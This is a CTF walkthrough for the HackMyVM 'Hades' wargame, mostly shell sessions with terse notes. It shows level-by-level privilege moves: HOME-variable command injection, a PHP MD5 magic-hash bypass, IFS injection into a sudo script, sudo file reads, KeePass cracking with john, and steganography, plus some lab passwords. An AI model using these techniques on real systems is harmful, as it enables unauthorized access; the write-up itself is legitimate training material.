hackmyvm hades note

Posted on In Views: Disqus: Word count in article: 3.9k Reading time ≈ 14 mins.
hades to irene

aphrodite

1
2
3
4
5
6
7
8
9
10
11
12
13
aphrodite@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x07 #
################

## EN ##
The user ariadne knows what we keep in our HOME.

aphrodite@hades:~$ HOME=";cat /pwned/aphrodite/ariadne_pass.txt" ./homecontent
The content of your HOME is:
ariadne_pass.txt  flagz.txt  homecontent  mission.txt
????????????????????

asteria

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
################
# MISSION 0x12 #
################

## EN ##
The user astraea believes in magic.

## ES ##
La usuaria astraea cree en la magia.

asteria@hades:~$ cat sihiri_old.php

<?php
$pass = hash('md5', $_GET['pass']);
$pass2 = hash('md5',"ASTRAEA_PASS");
if($pass == $pass2){
print("ASTRAEA_PASS");
}
else{
print("Incorrect ^^");
}
?>

asteria@hades:~$ curl http://localhost/sihiri.php?pass=QNKCDZO

????????????????????

astraea

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
astraea@hades.hackmyvm.eu's password:
^????????????????????^
Connection to hades.hackmyvm.eu closed.

ftp> get flagz.txt

asteria@hades:/var/tmp$ cat flag*
cat: flagggg: Permission denied
^????????????????????
^????????????????????

asteria@hades:~$ ftp localhost
ftp> lcd /var/tmp
Local directory now: /var/tmp
ftp> get mission.txt
ftp> get atalanta.txt
ftp> exit

asteria@hades:/var/tmp$ cat mission.txt atalanta.txt
################
# MISSION 0x13 #
################

## EN ##
The user atalanta has done something with our account.

## ES ##
La usuaria atalanta ha hecho algo con nuestra cuenta.
????????????????????

atalanta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
atalanta@hades:~$ ls -la
total 56
drwxr-x--- 2 root     atalanta  4096 Apr  5  2024 .
drwxr-xr-x 1 root     root      4096 Apr  5  2024 ..
-rw-r--r-- 1 atalanta atalanta   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 atalanta atalanta  3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 atalanta atalanta   807 Apr 23  2023 .profile
-rw-r----- 1 root     atalanta    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root     atalanta   237 Apr  5  2024 mission.txt
-r-sr-s--- 1 root     atalanta 16608 Apr  5  2024 weird
-r-------- 1 atalanta atalanta   927 Apr  5  2024 weird.c
atalanta@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x14 #
################

## EN ##
User athena lets us run her program, but she hasn't left us her source code.

## ES ##
La usuaria athena nos deja ejecutar su programa, pero no nos ha dejado su codigo fuente.

atalanta@hades:~$ mktemp -d
/tmp/tmp.oEM2noP6Aj
atalanta@hades:~$ cd /tmp/tmp.oEM2noP6Aj
atalanta@hades:/tmp/tmp.oEM2noP6Aj$ touch a
atalanta@hades:/tmp/tmp.oEM2noP6Aj$ chmod 777 a
atalanta@hades:/tmp/tmp.oEM2noP6Aj$ chmod 777 /tmp/tmp.oEM2noP6Aj
atalanta@hades:/tmp/tmp.oEM2noP6Aj$ ls -la
total 0
drwxrwxrwx  2 atalanta atalanta   60 Jul 27 06:26 .
drwxr-x-wx 15 root     root     1040 Jul 27 06:26 ..
-rwxrwxrwx  1 atalanta atalanta    0 Jul 27 06:26 a
atalanta@hades:/tmp/tmp.oEM2noP6Aj$ HOME=/tmp/tmp.oEM2noP6Aj/a ~/weird
HOME detected: /tmp/tmp.oEM2noP6Aj/a
atalanta@hades:/tmp/tmp.oEM2noP6Aj$ cat a
????????????????????

athena

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
athena@hades:~$ ls -la
total 36
drwxr-x--- 2 root   athena 4096 Apr  5  2024 .
drwxr-xr-x 1 root   root   4096 Apr  5  2024 ..
-rw-r--r-- 1 athena athena  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 athena athena 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 athena athena  807 Apr 23  2023 .profile
-rw-r----- 1 root   athena  166 Apr  5  2024 auri_old.sh
-rw-r----- 1 root   athena   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root   athena  160 Apr  5  2024 mission.txt
athena@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x15 #
################

## EN ##
User aura lets us use her new script.

## ES ##
La usuaria aura nos deja utilizar su nuevo script.

athena@hades:~$ cat auri_old.sh

#!/bin/bash
echo "What?"
read hackme
#Secure the condition!
#if [[ $hackme =~ "????????" ]]; then
#exit
#fi
#Add newest Aura pass!
#$hackme AURANEWPASS 2>/dev/null

athena@hades:~$ sudo -u aura /bin/bash -c /pwned/aura/auri.sh
What?
printf
????????????????????

aura

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
aura@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x16 #
################

## EN ##
User aegle has a good memory for numbers.

## ES ##
La usuaria aegle tiene buena memoria para los numeros.

aura@hades:~$ ./numbers
Enter one number:
1
Number OK
Enter next number:
2
Number OK
Enter next number:
3
Number OK
Enter next number:
1
Number OK
Enter next number:
2
Number OK
Enter next number:
3
Number OK
Enter next number:
1

NO :_(
aura@hades:~$ for i in $(seq 0 10); do echo -e "1\n2\n3\n1\n2\n3\n9\n1\n1\n1\n1\n2\n$i\n" | ./numbers; done
...
????????????????????
...

aegle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
aegle@hades:~$ ls -la
total 36
drwxr-x--- 2 root  aegle    4096 Apr  5  2024 .
drwxr-xr-x 1 root  root     4096 Apr  5  2024 ..
-rw-r--r-- 1 aegle aegle     220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 aegle aegle    3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 aegle aegle     807 Apr 23  2023 .profile
-rw-r----- 1 root  calliope   21 Apr  5  2024 calliope_pass.txt
-rw-r----- 1 root  aegle      22 Apr  5  2024 flagz.txt
-rw-r----- 1 root  aegle     176 Apr  5  2024 mission.txt
aegle@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x17 #
################

## EN ##
User calliope likes to have her things looked at.

## ES ##
A la usuaria calliope le gusta que le miren sus cosas.

aegle@hades:~$ sudo -l
Matching Defaults entries for aegle on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User aegle may run the following commands on hades:
    (calliope) NOPASSWD: /bin/cat
aegle@hades:~$ sudo -u calliope /bin/cat /pwned/calliope/flagz.txt
^????????????????????

17: calliope/IlhyWxZuqIHAuqVOpXfQ

calliope

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
calliope@hades:~$ ls -la
total 52
drwxr-x--- 3 root     calliope  4096 Apr  5  2024 .
drwxr-xr-x 1 root     root      4096 Apr  5  2024 ..
-rw-r--r-- 1 calliope calliope   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 calliope calliope  3533 Apr  5  2024 .bashrc
-rw-r--r-- 1 calliope calliope   807 Apr 23  2023 .profile
drwxr-xr-x 2 root     root      4096 Apr  5  2024 .ssh
-rw-r----- 1 root     calliope    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root     calliope   175 Apr  5  2024 mission.txt
-r-s--s--- 1 root     calliope 16360 Apr  5  2024 writeme
calliope@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x18 #
################

## EN ##
The user calypso often uses write to communicate.

## ES ##
La usuaria calypso suele usar write para comunicarse.


calliope@hades:~$ mesg
is n
calliope@hades:~$ mesg y
calliope@hades:~$ ./writeme
Cannot send you my pass!Cannot send you my pass!Cannot send you my pass!TAMYefoHcCPmexwImodo^OCbFzMIKPQOZQMEUKwEi^Cannot send you my pass!calliope@hades:~$

calypso

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
calypso@hades:~$ ls -la
total 8556
drwxr-x--- 2 root    calypso    4096 Apr  5  2024 .
drwxr-xr-x 1 root    root       4096 Apr  5  2024 ..
-rw-r--r-- 1 calypso calypso     220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 calypso calypso    3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 calypso calypso     807 Apr 23  2023 .profile
-rw-r----- 1 root    calypso 8726358 Dec 20  2021 cassy.wav
-rw-r----- 1 root    calypso      22 Apr  5  2024 flagz.txt
-rw-r----- 1 root    calypso     164 Apr  5  2024 mission.txt
calypso@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x19 #
################

## EN ##
User cassandra always wanted to be on TV.

## ES ##
La usuaria cassandra siempre quiso salir en la TV.


❯ scp -P 6666 calypso@hades.hackmyvm.eu:~/cassy.wav .
❯ install qsstv
config->sound->sound input from file
receive pic

CKzlnvmHQz

cassandra

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
cassandra@hades:~$ ls -la
total 36
drwxr-x--- 2 root      cassandra 4096 Apr  5  2024 .
drwxr-xr-x 1 root      root      4096 Apr  5  2024 ..
-rw-r--r-- 1 cassandra cassandra  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 cassandra cassandra 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 cassandra cassandra  807 Apr 23  2023 .profile
-rw-r----- 1 root      cassandra   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root      cassandra  369 Apr  5  2024 here.txt
-rw-r----- 1 root      cassandra  147 Apr  5  2024 mission.txt
cassandra@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x20 #
################

## EN ##
User cassiopeia sees the invisible.

## ES ##
La usuaria cassiopeia ve lo invisible.

cassandra@hades:~$ cat here.txt
VGhlIHBhc3N3b3JkIG9mIGNhc3Npb3BlaWEgaXM6CSAgICAgIAkgICAgCSAgIAkgICAgIAkgICAg
CSAgICAKICAgCSAgICAJICAJICAgIAkgCSAgIAkgICAgICAgCSAgICAJICAgIAoJICAgICAgCQkg
CSAgIAkgICAJICAgIAkgICAgIAkgICAgIAkgIAogICAJIAkgICAgIAkgICAgICAJICAgIAkgICAg
ICAJICAJICAJIAkgICAKICAgCSAgICAgIAkgICAgCSAJICAgICAJICAgICAgCSAgICAJICAgCSAg
ICAgCgkgICAgCSAgICAJIAkgICAgICAJICAgICAJIAkgCSAgICAgICAJIAo=

┌──(vagrant㉿kali)-[~]
└─$ cat here.txt| base64 -d > a

┌──(vagrant㉿kali)-[~]
└─$ stegsnow a
????????????????????

cassiopeia

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
cassiopeia@hades:~$ ls -al
total 32
drwxr-x--- 2 root       cassiopeia 4096 Apr  5  2024 .
drwxr-xr-x 1 root       root       4096 Apr  5  2024 ..
-rw-r--r-- 1 cassiopeia cassiopeia  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 cassiopeia cassiopeia 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 cassiopeia cassiopeia  807 Apr 23  2023 .profile
-rw-r----- 1 root       cassiopeia   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root       cassiopeia  131 Apr  5  2024 mission.txt
cassiopeia@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x21 #
################

## EN ##
User clio hates spaces.

## ES ##
La usuaria clio odia los espacios.
cassiopeia@hades:~$ sudo -l
Matching Defaults entries for cassiopeia on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User cassiopeia may run the following commands on hades:
    (clio) NOPASSWD: /bin/bash -c /usr/local/src/differences.sh

cassiopeia@hades:/tmp/tmp.CGOZYkJ5b1$ cat /usr/local/src/differences.sh

#!/bin/bash
echo File to compare:!
read differences
IFS=0 read file1 file2 <<< "$differences"

if [[ "$differences" =~ \ |\' ]]
then
   echo "No spaces!!"
else
/usr/bin/diff $file1 $file2
fi

cassiopeia@hades:/tmp/tmp.CGOZYkJ5b1$ chmod 777 a
cassiopeia@hades:/tmp/tmp.CGOZYkJ5b1$ chmod 777 .
cassiopeia@hades:/tmp/tmp.CGOZYkJ5b1$ sudo -u clio /bin/bash -c /usr/local/src/differences.sh
File to compare:!
/pwned/clio/flagz.txt0/tmp/tmp.CGOZYkJ5b1/a
1c1
< ^XUJbvPwAZYgoUgkpeSv^
---
>

clio

1
2
3
4
5
6
7
8
9
10
11
12
13
clio@hades:~$ cat mission.txt
################
# MISSION 0x22 #
################

## EN ##
The user cybele uses her lastname as a password.

## ES ##
La usuaria cybele usa su apellido como password.

clio@hades:~$ cat /etc/passwd | grep cybel
cybele:x:2014:2014:UICacOPmJMWbKyPwNZod:/pwned/cybele:/bin/bash

cybele

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
cybele@hades:~$ ls -al
total 3220
drwxr-x--- 2 root   cybele    4096 Apr  5  2024 .
drwxr-xr-x 1 root   root      4096 Apr  5  2024 ..
-rw-r--r-- 1 cybele cybele     220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 cybele cybele    3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 cybele cybele     807 Apr 23  2023 .profile
-rw-r----- 1 root   cybele      22 Apr  5  2024 flagz.txt
-rw-r----- 1 root   cybele 3263057 Dec 30  2021 fun.png
-rw-r----- 1 root   cybele     163 Apr  5  2024 mission.txt
cybele@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x23 #
################

## EN ##
User cynthia sees things that others dont.

## ES ##
La usuaria cynthia ve cosas que el resto no ven.

stegsolve

????????????????????

cynthia

Gemini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
cynthia@hades:~$ ls -al
total 32
drwxr-x--- 2 root    cynthia 4096 Apr  5  2024 .
drwxr-xr-x 1 root    root    4096 Apr  5  2024 ..
-rw-r--r-- 1 cynthia cynthia  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 cynthia cynthia 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 cynthia cynthia  807 Apr 23  2023 .profile
-rw-r----- 1 root    cynthia   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root    cynthia  187 Apr  5  2024 mission.txt
cynthia@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x24 #
################

## EN ##
User daphne once told us: Gemini? gem-evil.hmv? WTF?

## ES ##
La usuaria daphne nos dijo una vez: Gemini? gem-evil.hmv? WTF?

cynthia@hades:~$ echo -e "gemini://gem-evil.hmv/\r" | openssl s_client -connect 127.0.0.1:1965 -servername gem-evil.hmv -quiet
depth=0 CN = gem-evil.hmv
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = gem-evil.hmv
verify return:1
20 text/gemini

# Welcome to mi Gemini Server!
## What are you looking for?
????????????????????

delia

need two ssh

1
2
3
4
5
6
7
8
9
10
# use this shell create middle file, chmod, ls -al > file, cat ./* > file.....

^Q°▒HP≤E─M␊⎻⎽O␍M│QCQ^
################
# MISSION ▮│26 #
################

## EN ##
U⎽␊⎼ ␍␊└␊├␊⎼ ⎼␊▒␍⎽ ␋┼ ▒┼⎺├␤␊⎼ ┌▒┼±┤▒±␊↓
...
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
daphne@hades:~$ cat /var/tmp/ctf
^????????????????????
################
# MISSION 0x26 #
################

## EN ##
User demeter reads in another language.

## ES ##
La usuaria demeter lee en otro idioma.

daphne@hades:~$ cat /var/tmp/ctf
total 48
drwxr-x--- 2 root  delia  4096 Apr  5  2024 .
drwxr-xr-x 1 root  root   4096 Apr  5  2024 ..
-rw-r--r-- 1 delia delia   220 Apr 23  2023 .bash_logout
-r--r----- 1 delia delia  3539 Apr  5  2024 .bashrc
-rw-r--r-- 1 delia delia   807 Apr 23  2023 .profile
-rw-r----- 1 root  delia    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root  delia   150 Apr  5  2024 mission.txt
---x--x--- 1 delia delia 15952 Apr  5  2024 showpass
daphne@hades:~$ cat /var/tmp/ctf

????????????????????

demeter

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
demeter@hades:~$ ls -la
total 32
drwxr-x--- 2 root    demeter 4096 Apr  5  2024 .
drwxr-xr-x 1 root    root    4096 Apr  5  2024 ..
-rw-r--r-- 1 demeter demeter  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 demeter demeter 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 demeter demeter  807 Apr 23  2023 .profile
-rw-r----- 1 root    demeter   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root    demeter  119 Apr  5  2024 mission.txt
demeter@hades:~$ cat ./*
^????????????????????
################
# MISSION 0x27 #
################

## EN ##
The user echo permute.

## ES ##
La usuaria echo permuta.
demeter@hades:~$ sudo -l
Matching Defaults entries for demeter on hades:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User demeter may run the following commands on hades:
    (echo) NOPASSWD: /usr/bin/ptx

demeter@hades:~$ LFILE=/pwned/echo/flagz.txt;sudo -u echo ptx -w 5000 "$LFILE"
^????????????????????

echo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
echo@hades:~$ ls -al
total 468
drwxr-x--- 2 root echo   4096 Apr  5  2024 .
drwxr-xr-x 1 root root   4096 Apr  5  2024 ..
-rw-r--r-- 1 echo echo    220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 echo echo   3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 echo echo    807 Apr 23  2023 .profile
-rw-r----- 1 root echo     22 Apr  5  2024 flagz.txt
-rw-r----- 1 root echo    142 Apr  5  2024 mission.txt
-rw-r----- 1 root echo 442848 Dec 20  2021 noise.wav
echo@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x28 #
################

## EN ##
The user eos can see the sounds.

## ES ##
La usuaria eos puede ver los sonidos.

# spectrum
# audacity btw
CWBKRQX

eos

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
eos@hades:~$ ls -la
total 36
drwxr-x--- 2 root eos  4096 Apr  5  2024 .
drwxr-xr-x 1 root root 4096 Apr  5  2024 ..
-rw-r--r-- 1 eos  eos   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 eos  eos  3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 eos  eos   807 Apr 23  2023 .profile
-rw-r----- 1 root eos    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root eos   181 Apr  5  2024 mission.txt
-r-xr-x--- 1 root eos  1902 Apr  5  2024 secretz.kbdx
eos@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x29 #
################

## EN ##
The user gaia is very careful saving her passwords.

## ES ##
La usuaria gaia es muy precavida guardando sus passwords.

~/ctf
❯ keepass2john secretz.kbdx > hash

~/ctf
❯ john ./hash --wordlist=/home/kita/ctf/tool/dic/rockyou.txt
...
heaven           (secretz.kbdx)
...
# open with keepassxc
????????????????????

gaia

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
gaia@hades:~$ ls -al
total 40
drwxr-x--- 2 root gaia  4096 Apr  5  2024 .
drwxr-xr-x 1 root root  4096 Apr  5  2024 ..
-rw-r--r-- 1 gaia gaia   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 gaia gaia  3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 gaia gaia   807 Apr 23  2023 .profile
-rw-r----- 1 root gaia    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root gaia    10 Apr  5  2024 hpass1.txt
-rw-r----- 1 root powah   23 Apr  5  2024 hpass2.txt
-rw-r----- 1 root gaia   146 Apr  5  2024 mission.txt
gaia@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x30 #
################

## EN ##
User halcyon wants all the powah.

## ES ##
La usuaria halcyon quiere todo el powah.

gaia@hades:~$ cat hpass1.txt

manuela

gaia@hades:~$ cat hpass2.txt
cat: hpass2.txt: Permission denied
gaia@hades:~$ id
uid=2021(gaia) gid=2021(gaia) groups=2021(gaia)
gaia@hades:~$ id halcyon
uid=2022(halcyon) gid=2022(halcyon) groups=2022(halcyon)
gaia@hades:~$ cat /etc/passwd | grep powah
gaia@hades:~$ newgrp powah
Password:
gaia@hades:~$ id
uid=2021(gaia) gid=1000(powah) groups=1000(powah),2021(gaia)
gaia@hades:~$ cat hpass2.txt

????????????????????

halcyon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
halcyon@hades:~$ ls -la
total 32
drwxr-x--- 2 root    halcyon 4096 Apr  5  2024 .
drwxr-xr-x 1 root    root    4096 Apr  5  2024 ..
-rw-r--r-- 1 halcyon halcyon  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 halcyon halcyon 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 halcyon halcyon  807 Apr 23  2023 .profile
-rw-r----- 1 root    halcyon   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root    halcyon  252 Apr  5  2024 mission.txt
halcyon@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x31 #
################

## EN ##
The user hebe has one 'magicword' to get her password using http://localhost/req.php

## ES ##
La usuaria hebe tiene una 'magicword' para obtener su password usando http://localhost/req.php

halcyon@hades:~$ curl http://localhost/req.php?magicword=password

????????????????????

hebe

IRC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
hebe@hades:~$ ls -al
total 32
drwxr-x--- 2 root hebe 4096 Apr  5  2024 .
drwxr-xr-x 1 root root 4096 Apr  5  2024 ..
-rw-r--r-- 1 hebe hebe  220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 hebe hebe 3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 hebe hebe  807 Apr 23  2023 .profile
-rw-r----- 1 root hebe   22 Apr  5  2024 flagz.txt
-rw-r----- 1 root hebe  232 Apr  5  2024 mission.txt
hebe@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x32 #
################

## EN ##
User hera refuses to use Discord, she prefer an older and open source service.

## ES ##
La usuaria hera se niega a usar Discord, prefiere un medio mas antiguo y abierto.

hebe@hades:~$ /var/tmp/busybox netstat -tulpne
netstat: can't scan /proc - are you root?
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9001            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:6667          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.11:35635        0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 :::1965                 :::*                    LISTEN      -
tcp        0      0 :::80                   :::*                    LISTEN      -
tcp        0      0 :::21                   :::*                    LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -
udp        0      0 0.0.0.0:46815           0.0.0.0:*                           -
udp        0      0 127.0.0.11:44014        0.0.0.0:*                           -

hebe@hades:~$ /var/tmp/busybox nc localhost 6667
:hades.hmv NOTICE * :*** Looking up your hostname...
:hades.hmv NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (127.0.0.1) instead.
NICK kita
USER kita 0 * :kita
:hades.hmv 001 KNICK :Welcome to the Devilnet IRC Network KNICK!kita@127.0.0.1
:hades.hmv 002 KNICK :Your host is hades.hmv, running version InspIRCd-3
:hades.hmv 003 KNICK :This server was created 08:43:58 Feb 23 2025
:hades.hmv 004 KNICK hades.hmv InspIRCd-3 iosw Pbiklmnopstv :bklov
:hades.hmv 005 KNICK AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,Pimnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server
:hades.hmv 005 KNICK MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Devilnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server
:hades.hmv 251 KNICK :There are 0 users and 0 invisible on 1 servers
:hades.hmv 253 KNICK 1 :unknown connections
:hades.hmv 254 KNICK 1 :channels formed
:hades.hmv 255 KNICK :I have 0 clients and 0 servers
:hades.hmv 265 KNICK :Current local users: 0  Max: 2
:hades.hmv 266 KNICK :Current global users: 0  Max: 2
:hades.hmv 375 KNICK :hades.hmv message of the day
:hades.hmv 372 KNICK :
:hades.hmv 372 KNICK :**************************************************
:hades.hmv 372 KNICK :*             H    E    L    L    O              *
:hades.hmv 372 KNICK :*                                                  *
:hades.hmv 372 KNICK :*               Welcome to  Evil IRC.              *
:hades.hmv 372 KNICK :*                                                  *
:hades.hmv 372 KNICK :**************************************************
:hades.hmv 372 KNICK :
:hades.hmv 376 KNICK :End of message of the day.
list
:hades.hmv 321 KNICK Channel :Users Name
:hades.hmv 322 KNICK #test 1 :[+nt]
:hades.hmv 322 KNICK #channel666 0 :[+Pnt] Welcome hacker! Take it: JzpyRXRzWoHKZwgWzleM
:hades.hmv 323 KNICK :End of channel list.

hera

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
hera@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x33 #
################

## EN ##
User hermione would like to know what hera was doing.

## ES ##
A la usuaria hermione le gustaria saber que hacia hera.
hera@hades:~$ cat .bash_history

ls
ps
sudo -u hermione bash
cp /etc /etc2
^????????????????????^
ls
id
cat /usr/hera
rm /usr/hera
whoami
zip -R etc.zip /etc

hera@hades:~$ find / -type f -group hera 2>/dev/null | grep -v proc
/usr/hera
/var/tmp/mira2Pass
/var/tmp/miraPASS.pub
/var/tmp/miraPASS
/pwned/hera/.bash_history
/pwned/hera/.bash_logout
/pwned/hera/.bashrc
/pwned/hera/.ssh/authorized_keys
/pwned/hera/.ssh/id_rsa
/pwned/hera/flagz.txt
/pwned/hera/mission.txt
/pwned/hera/.profile

hera@hades:~$ cat /usr/hera
????????????????????

hermione

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
hermione@hades:~$ ls -la
total 52
drwxr-x--- 1 root     hermione  4096 Apr  5  2024 .
drwxr-xr-x 1 root     root      4096 Apr  5  2024 ..
-rw-r--r-- 1 hermione hermione   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 hermione hermione  3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 hermione hermione   807 Apr 23  2023 .profile
-rwxrwxrwx 1 hermione hermione 16056 Apr  5  2024 beastgroup
-rw-r----- 1 root     hermione    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root     hermione   158 Apr  5  2024 mission.txt
hermione@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x34 #
################

## EN ##
User hero only talks to some groups.

## ES ##
La usuaria hero solo se habla con algunos grupos.
hermione@hades:~$ newgrp beast
hermione@hades:~$ id
uid=2025(hermione) gid=6666(beast) groups=6666(beast),2025(hermione)
hermione@hades:~$ ./beastgroup

????????????????????

hero

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
hero@hades:~$ ls -al
total 48
drwxr-x--- 2 root hero  4096 Apr  5  2024 .
drwxr-xr-x 1 root root  4096 Apr  5  2024 ..
-rw-r--r-- 1 hero hero   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 hero hero  3526 Apr 23  2023 .bashrc
-rw-r--r-- 1 hero hero   807 Apr 23  2023 .profile
---s--s--- 1 root hero 16056 Apr  5  2024 cleaner
-rw-r----- 1 root hero    22 Apr  5  2024 flagz.txt
-rw-r----- 1 root hero   173 Apr  5  2024 mission.txt
hero@hades:~$ cat flagz.txt mission.txt
^????????????????????
################
# MISSION 0x35 #
################

## EN ##
User hestia likes to keep the screen clean.

## ES ##
A la usuaria hestia le gusta mantener la pantalla limpia.

hero@hades:~$ ./cleaner
hero@hades:~$ id
